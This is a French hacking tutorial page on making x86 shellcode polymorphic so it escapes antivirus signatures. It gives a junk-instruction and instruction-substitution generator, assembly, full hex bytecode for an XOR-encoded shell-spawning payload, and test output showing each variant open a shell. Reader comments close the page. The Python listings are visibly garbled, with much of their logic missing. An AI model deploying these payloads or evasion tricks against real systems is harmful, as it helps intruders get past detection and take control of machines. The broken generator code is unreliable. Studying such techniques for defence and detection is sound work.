Bases Hacking

Archives ...

Décodeur polymorphique

II°) Décodeur polymorphique

Ajouts d'opérations neutres
En premier lieu, afin d'obscurcir le code de notre décodeur, il est possible d'ajouter des instructions qui ne changent rien à la sémantique réelle du code. Pour mon exemple, j'ai retenu les instructions suivantes :

Bien sûr, les combinaisons sont infinies. Ceci dit, il faut tout de même prendre garde à l'utilisation de la pile. Par exemple, ici nous sommes partis du principe que le haut de la pile nous était égal, ce qui n'est pas toujours le cas, car notre shellcode peut s'y trouver. En termes d'implémentation, on peut imaginer un programme simple rajoutant au hasard ce type d'instructions :

#!/usr/bin/python

import random

NOP_PERCENT=50

registers=["eax","ebx","ecx","edx","esi","edi"]
unused_registers=[]
asm_lines=[]

def get_unused_registers():

unused_registers.remove(reg)

def get_nop():

nb_choice = nb_choice+2

return "nop"

break

def transform():

line=line.strip("\n")

nomore=True

print get_nop()

nomore=False

def main():

if __name__ == "__main__":

main()

On remarquera tout de même dans la fonction transform() que nous avons pris soin de ne pas écrire avant le "BITS 32", ni après le label "sc:" pour ne pas modifier le pointeur retournée vers le shellcode, ni avant le "jne" pour ne pas ajouter d'instructions qui modifient les valeurs des flags permettant de connaitre le résultat du cmp. Il y aura environ une séquence d'instructions inutiles pour deux lignes utiles (ce qui fait in fine beaucoup mais n'est pas grave pour les besoins de cette démonstration). Un coup d'oeil rapide au type de code généré :

$ ./transform_shellcode.py unxor_shellcode.asm
BITS 32
push edi
pop edi

jmp short sc
push ecx
pop ecx

inc edi
retour:

mov edi,590357073

boucle:

mov edx,729692240

inc ebx
dec ebx

push esi
pop esi

inc esi
dec esi

sc:

On peut désormais comparer le code assemblé avec l'assemblage non-obscurci :

Bytecode original
\xeb\x15\x5e\x31\xc0\x31\xdb\x31\xc9\xb3\x2e\xb0\x9f\x31\x04\x0e\x41\x39\xcb\x75
\xf8\xff\xe6\xe8\xe6\xff\xff\xff\xae\x5f\x2f\xd9\xae\x44\xae\x56\x52\x1f\x74\x89
\xc4\xae\x5f\x17\xdc\x98\x16\xc4\x97\x16\xdc\x93\x2f\x94\x12\xd4\x97\x12\xcc\x93
\x52\x1f\x77\x7a\x60\x60\x60\xb0\xfd\xf6\xf1\xb0\xec\xf7

Après transformation
\x57\x5f\xeb\x28\x51\x59\x47\x5e\x31\xc0\x31\xdb\x31\xc9\xb3\x2e\xb0\x9f\xbf\x51
\x22\x30\x23\xba\x50\x38\x7e\x2b\x31\x04\x0e\x41\x43\x4b\x39\xcb\x75\xf1\x56\x5e
\xff\xe6\x46\x4e\xe8\xd6\xff\xff\xff\xae\x5f\x2f\xd9\xae\x44\xae\x56\x52\x1f\x74
\x89\xc4\xae\x5f\x17\xdc\x98\x16\xc4\x97\x16\xdc\x93\x2f\x94\x12\xd4\x97\x12\xcc
\x93\x52\x1f\x77\x7a\x60\x60\x60\xb0\xfd\xf6\xf1\xb0\xec\xf7

On se rend donc bien compte de la dispersion des opcodes pouvant faire office de signature et même de la modification de certains d'entre eux (opcodes soulignés, grâce à la modification des référentiels pour les jmp notamment).

Transformation des instructions
Toujours dans l'optique de rendre plus difficile la génération de signatures, il est possible de modifier les instructions utiles de manière à ce que la sémantique demeure tout de même inchangée. C'est là toute l'essence du polymorphisme d'ailleurs. Etant donné la taille des jeux d'instructions actuels, cet univers est encore plus hautement infini et peut parfois être complexe. Nous avons décidé de remplacer trois types d'instructions que nous utilisons dans notre shellcode :

Nous pouvons donc implémenter ces substitutions de manière aléatoire dans le programme précédent :

x01010101=16843009
x02020202=33686018

def get_mov(val1,val2):

num = int(val2[:-1],16)

num = int(val2)

return "mov " + val1 + ", 2\ndec " + val1

return "mov " + val1 + ", 1h\ninc " + val1

return "mov " + val1 + ", " + str(num - 2) + "\ninc e" + val1[0] + "x\ninc e" + val1[0] + "x"

def get_xor(val1,val2):

return "and " + val1 + ", " + str(x01010101) + "\nand " + val2 + ", " + str(x02020202)

return "sub " + val1 + ", " + val1

def get_pop(reg):

return "mov " + reg + ", [esp]\nadd esp,0x01010105\nsub esp, " + str(x01010101)

Avec le remplacement de ces instructions, nous avons donc un shellcode complètement polymorphique, par l'encryption de son essence et par le métamorphisme de son décodeur. Afin de tester les bytecodes ainsi générés, nous avons automatisé la chaîne de production et de test dans un petit script shell :

$ ./polymorphic_shellcode.sh shellcode
New shellcode:
\x47\xeb\x45\xbf\xad\x7e\x09\x59\x90\x5e\x31\xc0\x29\xdb\x41\x49\x31\xc9\x53\x5b
\xb3\x2e\x50\x5f\x81\xe7\x01\xff\xff\xff\x81\xe7\x02\xff\xff\xff\x81\xc7\xa6\x01
\x01\x01\x47\x57\x58\x2d\x01\x01\x01\x01\x40\xba\x1a\xd4\xc5\x08\x47\x31\x04\x0e
\x42\x41\x39\xcb\x75\xf7\x43\x4b\xff\xe6\x56\x5e\xe8\xbb\xff\xff\xff\x96\x67\x17
\xe1\x96\x7c\x96\x6e\x6a\x27\x4c\xb1\xfc\x96\x67\x2f\xe4\xa0\x2e\xfc\xaf\x2e\xe4
\xab\x17\xac\x2a\xec\xaf\x2a\xf4\xab\x6a\x27\x4f\x42\x58\x58\x58\x88\xc5\xce\xc9
\x88\xd4\xcf
Launching normal shellcode
Length: 46 bytes
sh-3.2$ exit
exit
Launching polymorphic shellcode
Length: 123 bytes
sh-3.2$ exit
exit

$ ./polymorphic_shellcode.sh shellcode
New shellcode:
\x52\x89\xda\x52\x5b\x5a\xba\x4b\x65\xed\xe7\xeb\x49\x53\x89\xd3\x53\x5a\x5b\x5e
\x29\xc0\x29\xdb\x57\x89\xdf\x57\x5b\x5f\x81\xe1\x01\x01\x01\x01\x81\xe1\x02\x02
\x02\x02\xb3\x2e\x47\x50\x5f\x81\xe7\x01\xff\xff\xff\x81\xe7\x02\xff\xff\xff\x81
\xc7\x5d\x01\x01\x01\x47\x57\x58\x2d\x01\x01\x01\x01\x40\x31\x04\x0e\x41\x39\xcb
\x75\xf8\x41\x49\xff\xe6\xe8\xb8\xff\xff\xff\x6f\x9e\xee\x18\x6f\x85\x6f\x97\x93
\xde\xb5\x48\x05\x6f\x9e\xd6\x1d\x59\xd7\x05\x56\xd7\x1d\x52\xee\x55\xd3\x15\x56
\xd3\x0d\x52\x93\xde\xb6\xbb\xa1\xa1\xa1\x71\x3c\x37\x30\x71\x2d\x36
Launching normal shellcode
Length: 46 bytes
sh-3.2$ exit
exit
Launching polymorphic shellcode
Length: 137 bytes
sh-3.2$ exit
exit

$ cat .polymorphic_shellcode.asm
BITS 32
push edx
mov edx,ebx
push edx
pop ebx
pop edx

mov edx,3891094859
jmp short sc

push ebx
mov ebx,edx
push ebx
pop edx
pop ebx
retour:

pop esi

mov bl, 46

boucle:

xor [esi+ecx],eax
inc ecx
cmp ebx,ecx
jne boucle

jmp esi

sc:

call retour
shellcode db
0x6f,0x9e,0xee,0x18,0x6f,0x85,0x6f,0x97,0x93,0xde,0xb5,0x48,0x05,0x6f,0x9e,
0xd6,0x1d,0x59,0xd7,0x05,0x56,0xd7,0x1d,0x52,0xee,0x55,0xd3,0x15,0x56,0xd3,0x0d,0x52,0x93,0xde,
0xb6,0xbb,0xa1,0xa1,0xa1,0x71,0x3c,0x37,0x30,0x71,0x2d,0x36

Nous obtenons donc un shellcode de taille variable (de manière générale entre 100 et 160 bytes), qui est très différent d'une génération sur l'autre, comme le montrent les deux essais effectuées, et quasiment impossible à analyser, même désassemblé. Le code original est en rouge sur cet exemple est reste très éparpillé (d'autant que ce qui demeure est soit le code encrypté soit des portions que nous n'avons pas traitré dans notre exemple). Bien sûr, des générations plus fines permettent de contrôler la taille du shellcode généré et d'effectuer des obfuscations plus complètes (le mieux dans notre cas serait tout de même de modifier la boucle principale et notamment le xor, d'autant que a xor b peut se réécrire sous de multiples formes, comme par exemple (a&~b) | (~a&b)).
Maintenant que nous avons compris tous ces mécanismes, il n'y a pas de honte à utiliser des outils qui permettent de générer automatique ce type de shellcode de bien meilleure manière, pour de multiples sémantiques et de multiples plateformes, notamment Metasploit.

<< Shellcode auto-décodant

5 Commentaires
Afficher tous

yohann	24/05/13 16:11
les commentaires dans le code !!
Anonyme	19/12/11 17:19
Excellent même si on "plonge" d'un coup profondément dans des choses assez complexes.
Will	07/12/11 19:18
Interressant mais chaud à comprendre !
David	21/09/11 18:36
Excellent tuto!

Commentaires désactivés.

Apprendre la base du hacking - Liens sécurité informatique/hacking - Contact